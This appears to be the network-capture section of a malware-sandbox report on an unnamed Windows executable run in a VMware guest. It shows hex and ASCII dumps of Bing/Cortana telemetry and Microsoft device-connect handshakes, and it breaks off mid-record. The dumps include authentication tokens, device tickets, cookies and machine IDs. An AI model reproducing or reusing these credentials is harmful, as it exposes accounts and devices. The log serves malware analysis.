2023-02-20 08:50:16 UTC	66	OUT	Data Raw: 47 3e 3c 44 53 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 44 2e 41 67 67 72 65 67 61 74 6f 72 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 41 67 67 72 65 67 61 74 6f 72 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 44 53 22 3a 5b 5d 2c 22 72 61 6e 6b 65 72 4d 6f 64 65 6c 49 64 73 22 3a 7b 22 66 61 73 74 52 61 6e 6b 4d 6f 64 65 6c 49 64 22 3a 22 53 54 48 5f 38 64 30 36 66 38 33 63 2d 64 61 35 38 2d 34 63 30 32 2d 38 66 65 38 2d 62 61 32 63 30 34 39 64 39 38 30 39 22 2c 22 63 69 56 65 72 73 69 6f 6e 22 3a 22 31 22 7d 7d 2c 7b 22 54 22 3a 22 44 2e 53 54 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 53 65 72 76 69 63 65 22 3a Data Ascii: G><DS><![CDATA[[{"T":"D.Aggregator","Service":"AutoSuggest","Scenario":"Aggregator","AppNS":"SmartSearch","DS":[],"rankerModelIds":{"fastRankModelId":"STH_8d06f83c-da58-4c02-8fe8-ba2c049d9809","ciVersion":"1"}},{"T":"D.ST","AppNS":"SmartSearch","Service":
2023-02-20 08:50:16 UTC	82	OUT	Data Raw: 6c 6f 77 20 70 6f 70 2d 75 70 73 22 2c 22 56 61 6c 22 3a 22 53 54 22 2c 22 48 6f 22 3a 32 2c 22 47 72 22 3a 31 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 38 36 38 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 43 6c 61 73 73 69 63 5f 7b 32 30 31 43 45 46 34 42 2d 37 34 34 34 2d 34 42 32 46 2d 42 38 38 35 2d 35 45 38 46 30 41 41 31 44 36 31 34 7d 22 2c 22 44 4e 61 6d 65 22 3a 22 42 6c 6f 63 6b 20 6f 72 20 61 6c 6c 6f 77 20 70 6f 70 2d 75 70 73 22 2c 22 4d 44 4e 22 3a 30 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 2d 32 2e 38 38 36 34 39 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 37 22 3a 31 32 38 Data Ascii: low pop-ups","Val":"ST","Ho":2,"Gr":1,"DeviceSignals":{"Rank":868,"PHits":"System.ParsingName","Id":"Classic_{201CEF4B-7444-4B2F-B885-5E8F0AA1D614}","DName":"Block or allow pop-ups","MDN":0},"RankerSignals":{"rankingScore":-2.88649,"featureStore":{"7":128
2023-02-20 08:50:16 UTC	87	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 23171AC2615546E0AF3575BC5FF49D06 Ref B: MIL30EDGE0914 Ref C: 2023-02-20T08:50:16Z Date: Mon, 20 Feb 2023 08:50:16 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.77ae0017.1676883016.30cc5874

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49701	23.0.174.123	443	C:\Users\user\Desktop\ .exe

Timestamp	kBytes transferred	Direction	Data
2023-02-20 08:50:20 UTC	87	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Content-type: text/xml X-MSEdge-ExternalExpType: JointCoord X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40 X-PositionerType: Desktop X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage X-Search-SafeSearch: Moderate X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8} X-UserAgeClass: Unknown X-BM-Market: US X-BM-DateFormat: M/d/yyyy X-CortanaAccessAboveLock: false X-Device-OSSKU: 48 X-BM-DTZ: -420 X-BM-FirstEnabledTime: 132061340710069592 X-DeviceID: 0100748C0900F045 X-BM-DeviceScale: 100 X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time X-BM-Theme: 000000;0078d7 X-BM-DeviceDimensionsLogical: 1232x1024 X-BM-DeviceDimensions: 1232x1024 X-Agent-DeviceId: 0100748C0900F045 X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATGOjhyCBrEl1Awji/g7SRpxfRm6uWBRuknppntx4OiUWhXYc4%2B3VQnWDF1be33N1ghsq3j4YMAI/YDUY38tMDQIa0safxbjvckEvW4tNqBM1O4tKr8hfvcKDOdVm5hOMuYmheSrgvEMOdpMN3JcqX5ZBSUZe4n9Mmx6YOtZo48C5mjJh%2Bzx42WFFIOLDIsKQmst1kJcfpJufkc0ZX4mGVgSQ3X%2BJNyj779EzrVHCPzqC9eEVVLpIgcQYH8VU5MPtC58KC2FM2gsmwePhmSBv5sAa35vDVSISQeT7PeFAb6eSz6jRU44rclCl9/zWgC2fmbvB5IeckE0QQ6uFneWYVsDZgAACNQSEqqyOT5iqAH5MRxWMYLqTyO2njozjedhAQ7YM0I82pzzoXTQ6tg332TSA2bDgR6Njn%2BNsmaq46AFimVMA5PShcvlHPpo7GqVeEWUtUledDOHejewOg/eCCo62oigQWy6B5/%2BH5Ce8OaZ1S6C/io7kvSaiD5Ggnb5dJowaWVfqx5x8e1c1YLcq5ezMB5IHUKhZINnTjvxvvUH%2BApHhRlENBwpIz5nN3v0OvdBVXAyrr2lQ9wYKsxTBreDU52epgCfgBSzvic6nyceUMT2G8cKJ5ad1FGZ0AGzleGhsX45QvQVBQRKiJ30E1rd22y7nZSTEXt%2BPT2h9dFP1MWr2kPCdqhXX5DGqUsvUXfxYG4qE93TMRMWuyg4MFCpWOYN5YxP85QjHsTwM9g6pblWpt4UQvxcD9d6sohVPA1Ammt8L5wtebIFFZptYU41hWJqpCZVQSwkefgUS2PpUd9EGRiPJbh1K2bkIv/0erBIrXPhhiVeyO%2BjCWNR0ltJADhqhNpuC32hi2A8k3%2BHrhg7cXM1Yx11gfh7OnF37PsvK6keCy0L94WbIS2ZOUSG33rPdEQv1gE%3D%26p%3D X-BM-CBT: 1660688483 X-Device-isOptin: true X-Device-Touch: false X-Device-ClientSession: A093DD4137F64C659186F72CE611649C X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 Host: www.bing.com Content-Length: 89942 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=0BA1234E3B2140EBA8746E9F98F8CAA3; _SS=CPID=1660688519156&AC=1&CPH=4ef661f2&HV=1660688519
2023-02-20 08:50:20 UTC	90	OUT	Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 62 37 36 38 32 33 32 61 36 65 64 38 34 66 66 33 62 36 39 39 62 66 30 33 66 31 66 31 36 30 65 64 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>b768232a6ed84ff3b699bf03f1f160ed</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
2023-02-20 08:50:20 UTC	106	OUT	Data Raw: 2c 22 54 22 3a 22 50 50 22 7d 2c 7b 22 56 22 3a 32 31 39 30 2c 22 54 22 3a 22 50 50 22 7d 5d 2c 22 49 52 54 22 3a 7b 22 31 30 30 39 2e 31 54 22 3a 7b 22 42 22 3a 32 31 38 39 2c 22 45 22 3a 32 31 38 39 2c 22 54 22 3a 22 50 50 22 7d 2c 22 31 30 31 30 2e 31 53 22 3a 7b 22 42 22 3a 32 31 39 30 2c 22 45 22 3a 32 31 39 30 2c 22 54 22 3a 22 50 50 22 7d 7d 7d 5d 2c 22 53 54 41 54 45 22 3a 7b 22 49 6e 64 65 78 65 72 22 3a 22 44 49 22 7d 2c 22 56 22 3a 22 32 22 2c 22 52 46 43 22 3a 7b 7d 2c 22 54 53 22 3a 31 35 36 31 36 36 30 35 38 39 38 35 32 2c 22 52 54 53 22 3a 31 31 38 35 39 30 2c 22 53 45 51 22 3a 35 35 2c 22 55 54 53 22 3a 31 36 37 36 39 31 35 34 32 30 36 31 30 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 35 36 31 36 36 30 35 38 39 38 35 32 3c 2f 54 53 3e 3c 2f 45 Data Ascii: ,"T":"PP"},{"V":2190,"T":"PP"}],"IRT":{"1009.1T":{"B":2189,"E":2189,"T":"PP"},"1010.1S":{"B":2190,"E":2190,"T":"PP"}}}],"STATE":{"Indexer":"DI"},"V":"2","RFC":{},"TS":1561660589852,"RTS":118590,"SEQ":55,"UTS":1676915420610}...</D><TS>1561660589852</TS></E
2023-02-20 08:50:20 UTC	122	OUT	Data Raw: 6e 73 22 2c 22 53 43 22 3a 31 2c 22 44 53 22 3a 5b 7b 22 54 22 3a 22 44 2e 55 72 6c 22 2c 22 4b 22 3a 31 31 34 2c 22 51 22 3a 22 69 6e 22 2c 22 56 61 6c 22 3a 22 53 57 22 2c 22 48 6f 22 3a 30 2c 22 47 72 22 3a 31 31 2c 22 4e 52 22 3a 31 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 2d 31 31 2e 34 34 32 33 36 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 34 22 3a 31 2c 22 37 22 3a 31 33 35 30 37 2c 22 31 30 22 3a 32 2c 22 31 39 22 3a 31 2c 22 32 35 22 3a 31 2c 22 34 32 22 3a 31 2c 22 35 39 22 3a 31 2c 22 31 33 33 22 3a 31 2c 22 31 33 36 22 3a 31 2c 22 31 33 37 22 3a 32 2c 22 32 36 34 22 3a 31 2c 22 32 39 36 22 3a 31 7d 7d 7d 5d 7d 5d 5d 5d 3e 3c 2f 44 53 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b Data Ascii: ns","SC":1,"DS":[{"T":"D.Url","K":114,"Q":"in","Val":"SW","Ho":0,"Gr":11,"NR":1,"RankerSignals":{"rankingScore":-11.44236,"featureStore":{"4":1,"7":13507,"10":2,"19":1,"25":1,"42":1,"59":1,"133":1,"136":1,"137":2,"264":1,"296":1}}}]}]...</DS><D><![CDATA[{
2023-02-20 08:50:20 UTC	138	OUT	Data Raw: 32 61 26 41 53 49 6e 69 74 49 47 3d 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 22 2c 22 52 65 73 6f 75 72 63 65 73 56 65 72 73 69 6f 6e 22 3a 22 38 5f 30 31 5f 30 5f 30 30 30 30 30 30 22 7d 2c 22 54 53 22 3a 31 35 36 31 36 36 30 35 38 38 31 38 32 2c 22 55 54 53 22 3a 31 36 37 36 39 31 35 34 32 30 36 31 30 2c 22 55 78 43 6c 61 73 73 69 66 69 63 61 74 69 6f 6e 22 3a 7b 22 63 6c 69 65 6e 74 22 3a 22 77 69 6e 64 6f 77 73 22 7d 2c 22 43 6f 6f 6b 69 65 73 22 3a 7b 22 53 41 5f 53 55 50 45 52 46 52 45 53 48 5f 53 55 50 50 52 45 53 53 22 3a 7b 22 4c 41 53 54 22 3a 22 31 36 36 30 36 38 38 35 31 39 31 34 34 22 7d 2c 22 4d 55 49 44 22 3a 22 30 42 41 31 32 33 34 45 33 42 32 31 34 30 45 42 41 38 37 34 36 45 39 46 39 Data Ascii: 2a&ASInitIG=C0409E84C7EC4D16A2CDDA4805E2D3C4","ResourcesVersion":"8_01_0_000000"},"TS":1561660588182,"UTS":1676915420610,"UxClassification":{"client":"windows"},"Cookies":{"SA_SUPERFRESH_SUPPRESS":{"LAST":"1660688519144"},"MUID":"0BA1234E3B2140EBA8746E9F9
2023-02-20 08:50:20 UTC	154	OUT	Data Raw: 22 3a 2d 31 31 2e 34 34 32 33 36 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 34 22 3a 31 2c 22 37 22 3a 31 33 35 33 38 2c 22 31 30 22 3a 33 2c 22 31 39 22 3a 31 2c 22 32 35 22 3a 31 2c 22 34 32 22 3a 31 2c 22 35 39 22 3a 31 2c 22 31 33 33 22 3a 31 2c 22 31 33 36 22 3a 31 2c 22 31 33 37 22 3a 33 2c 22 32 36 34 22 3a 31 2c 22 32 39 36 22 3a 31 7d 7d 7d 5d 7d 5d 5d 5d 3e 3c 2f 44 53 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 Data Ascii: ":-11.44236,"featureStore":{"4":1,"7":13538,"10":3,"19":1,"25":1,"42":1,"59":1,"133":1,"136":1,"137":3,"264":1,"296":1}}}]}]...</DS><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWid
2023-02-20 08:50:20 UTC	170	OUT	Data Raw: 2c 22 47 72 22 3a 30 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 31 33 35 33 38 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 4d 69 63 72 6f 73 6f 66 74 2e 4d 69 63 72 6f 73 6f 66 74 45 64 67 65 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 21 4d 69 63 72 6f 73 6f 66 74 45 64 67 65 22 2c 22 44 4e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 2c 22 41 70 70 4c 6e 63 68 22 3a 30 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 31 2c 22 45 78 74 22 3a 22 22 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 2d 32 2e 31 34 30 39 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 31 22 3a 31 2c 22 37 22 Data Ascii: ,"Gr":0,"DeviceSignals":{"Rank":13538,"PHits":"System.ParsingName","Id":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","DName":"Microsoft Edge","AppLnch":0,"Args":0,"MDN":1,"Ext":""},"RankerSignals":{"rankingScore":-2.1409,"featureStore":{"1":1,"7"
2023-02-20 08:50:21 UTC	178	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 7B587772709E43788E4CC8D8896998A6 Ref B: MIL30EDGE1118 Ref C: 2023-02-20T08:50:20Z Date: Mon, 20 Feb 2023 08:50:21 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.77ae0017.1676883020.30cc6c59

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49715	20.90.156.32	443	C:\Users\user\Desktop\ .exe

Timestamp	kBytes transferred	Direction	Data
2023-02-20 08:51:11 UTC	178	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 32 64 34 37 39 37 32 38 32 62 32 61 32 39 0d 0a 0d 0a Data Ascii: CNT 1 CON 246Context: da2d4797282b2a29
2023-02-20 08:51:11 UTC	178	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2023-02-20 08:51:11 UTC	178	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 32 64 34 37 39 37 32 38 32 62 32 61 32 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 39 4d 4a 33 41 6e 48 54 6f 42 75 77 67 37 31 41 76 6b 56 4b 54 70 49 2b 58 59 4e 65 66 75 42 52 56 37 5a 6e 31 71 35 37 69 65 78 65 42 5a 47 52 4b 7a 46 43 43 50 4a 64 56 36 71 5a 57 45 52 68 64 55 4c 75 78 78 2b 77 6a 35 2b 43 53 69 6b 36 42 42 34 41 64 78 53 36 4b 42 73 43 63 35 4e 53 73 39 5a 4c 77 72 54 39 78 45 4f 77 73 66 2b 33 44 74 76 4e 72 54 61 4d 57 63 6f 31 63 77 4b 77 56 67 4e 76 7a 69 30 Data Ascii: ATH 2 CON\DEVICE 1026Context: da2d4797282b2a29<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV9MJ3AnHToBuwg71AvkVKTpI+XYNefuBRV7Zn1q57iexeBZGRKzFCCPJdV6qZWERhdULuxx+wj5+CSik6BB4AdxS6KBsCc5NSs9ZLwrT9xEOwsf+3DtvNrTaMWco1cwKwVgNvzi0
2023-02-20 08:51:11 UTC	179	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 61 32 64 34 37 39 37 32 38 32 62 32 61 32 39 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 29Context: da2d4797282b2a29
2023-02-20 08:51:11 UTC	179	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2023-02-20 08:51:11 UTC	179	IN	Data Raw: 4d 53 2d 43 56 3a 20 75 32 4e 70 30 4b 2f 36 77 55 65 57 36 79 6e 59 39 75 41 75 58 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: u2Np0K/6wUeW6ynY9uAuXg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49716	20.90.152.133	443	C:\Users\user\Desktop\ .exe

Timestamp	kBytes transferred	Direction	Data
2023-02-20 08:51:19 UTC	179	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 38 39 32 31 37 39 36 39 64 38 64 34 38 62 32 0d 0a 0d 0a Data Ascii: CNT 1 CON 246Context: b89217969d8d48b2
2023-02-20 08:51:19 UTC	179	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2023-02-20 08:51:19 UTC	180	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 38 39 32 31 37 39 36 39 64 38 64 34 38 62 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 39 4d 4a 33 41 6e 48 54 6f 42 75 77 67 37 31 41 76 6b 56 4b 54 70 49 2b 58 59 4e 65 66 75 42 52 56 37 5a 6e 31 71 35 37 69 65 78 65 42 5a 47 52 4b 7a 46 43 43 50 4a 64 56 36 71 5a 57 45 52 68 64 55 4c 75 78 78 2b 77 6a 35 2b 43 53 69 6b 36 42 42 34 41 64 78 53 36 4b 42 73 43 63 35 4e 53 73 39 5a 4c 77 72 54 39 78 45 4f 77 73 66 2b 33 44 74 76 4e 72 54 61 4d 57 63 6f 31 63 77 4b 77 56 67 4e 76 7a 69 30 Data Ascii: ATH 2 CON\DEVICE 1026Context: b89217969d8d48b2<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAV9MJ3AnHToBuwg71AvkVKTpI+XYNefuBRV7Zn1q57iexeBZGRKzFCCPJdV6qZWERhdULuxx+wj5+CSik6BB4AdxS6KBsCc5NSs9ZLwrT9xEOwsf+3DtvNrTaMWco1cwKwVgNvzi0
2023-02-20 08:51:19 UTC	181	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 38 39 32 31 37 39 36 39 64 38 64 34 38 62 32 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 29Context: b89217969d8d48b2
2023-02-20 08:51:19 UTC	181	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2023-02-20 08:51:19 UTC	181	IN	Data Raw: 4d 53 2d 43 56 3a 20 54 73 55 70 57 6e 52 4b 45 6b 53 4c 66 6b 74 37 44 70 4f 56 41 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: TsUpWnRKEkSLfkt7DpOVAA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49720	20.90.156.32	443	C:\Users\user\Desktop\ .exe

Timestamp	kBytes transferred	Direction	Data
2023-02-20 08:51:30 UTC	181	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 32 34 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 62 64 30 66 38 34 36 38 34 63 63 30 36 31 0d 0a 0d 0a Data Ascii: CNT 1 CON 246Context: 16bd0f84684cc061
2023-02-20 08:51:30 UTC	181	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
2023-02-20 08:51:30 UTC	181	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 32 36 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 62 64 30 66 38 34 36 38 34 63 63 30 36 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 56 39 4d 4a 33 41 6e 48 54 6f 42 75 77 67 37 31 41 76 6b 56 4b 54 70 49 2b 58 59 4e 65 66 75 42 52 56 37 5a 6e 31 71 35 37 69 65 78 65 42 5a 47 52 4b 7a 46 43 43 50 4a 64 56 36 71 5a 57 45 52 68 64 55 4c 75 78 78 2b 77 6a 35 2b 43 53 69 6b 36 42 42 34 41 64 78 53 36 4b 42 73 43 63 35 4e 53 73 39 5a 4c 77 72 54 39 78 45 4f 77 73 66 2b 33 44 74 76 4e 72 54 61 4d 57 63 6f 31 63 77 4b 77 56 67 4e 76 7a 69 30 Data Ascii: ATH 2 CON\DEVICE 1026Context: 